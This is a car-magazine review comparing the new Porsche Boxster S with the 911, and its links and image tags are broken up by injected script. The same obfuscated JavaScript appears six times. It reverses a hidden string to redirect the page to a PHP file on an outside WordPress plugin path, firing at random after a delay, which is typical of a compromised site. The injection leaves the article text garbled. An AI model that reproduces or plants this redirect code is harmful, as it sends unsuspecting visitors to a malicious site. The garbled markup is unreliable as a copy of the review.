Look familiar? It should do. This is not the first time the new Porsche Boxster has put in an appearance at crankandpiston. As long ago as January when $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/new-porsche-boxster-all-grown-up/” target=”_blank”>the official pictures of the new-for-2013 Boxster first dropped, we were fired up and anxious to have a go. Then there was $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/new-porsche-boxster-s-convertible-a-re-awakening/” target=”_blank”>our recent trip to Stuttgart, Germany in which we spent two days lodged firmly in the pseudo-bucket hot seat waxing both lyrically and unceasingly on the supple ride, the improved drivability, and renewed desirability.
$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/08/IMG_8125.jpg” width=”728″ height=”485″ />
You’d think then that crankandpiston’s first crack with the new Boxster S on home turf in the Middle East would involve the now traditional cornucopia of adolescent enthusiasm, multi-kilometre thrashes and the odd editorial cliché.
Nope. Not this time. We’ve concerned ourselves with something else.
$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/08/IMG_8322.jpg” width=”728″ height=”485″ />
The leap – and that is the correct term here – between this Boxster S model and its predecessor has caught the automotive industry squarely on the chin and sent it staggering back towards the ropes. Nobody in all honesty really expected Porsche in this instance to deliver quite so vehemently. In times gone by, were you to purchase a Boxster, in the public eye all this did was confirm that you could not afford a 911. Now though, we wonder if that’s actually true.
$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/08/IMG_8200.jpg” width=”728″ height=”1131″ />
Though still not an out and out performance beast, the new Boxster S is tighter, more balanced, technically superior, and consequently more impressive than previous generations have been hitherto. One can’t help but get the feeling – when experiencing the responsive electromechanical steering, rapid seven-speed Porsche-Doppelkupplungsgetriebe (PDK) transmission, and more focused oomph from the 315hp 3.4l boxer engine – that this time around Porsche truly wanted to demonstrate just what the little brother of the clan could do when properly riled. Just a casual glance at the raw, sharpened contours and chiseled features of the new Boxster gets the message across. Amidst the good looks, there’s now presence.
All of a sudden the onus has shifted. In hushed tones, some are even questioning why you would buy a 911 over the new Boxster, a question deemed sacrilege only last year.
$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/08/IMG_8122.jpg” width=”728″ height=”485″ />
It’s a fair question though. One could argue that the 911 has the heritage and reputation that the Boxster could never equal. Yet still there remains over $30,000 difference in starting price between little and big brother, and that’s a sizeable amount even considering the 911’s history and two extra seats.
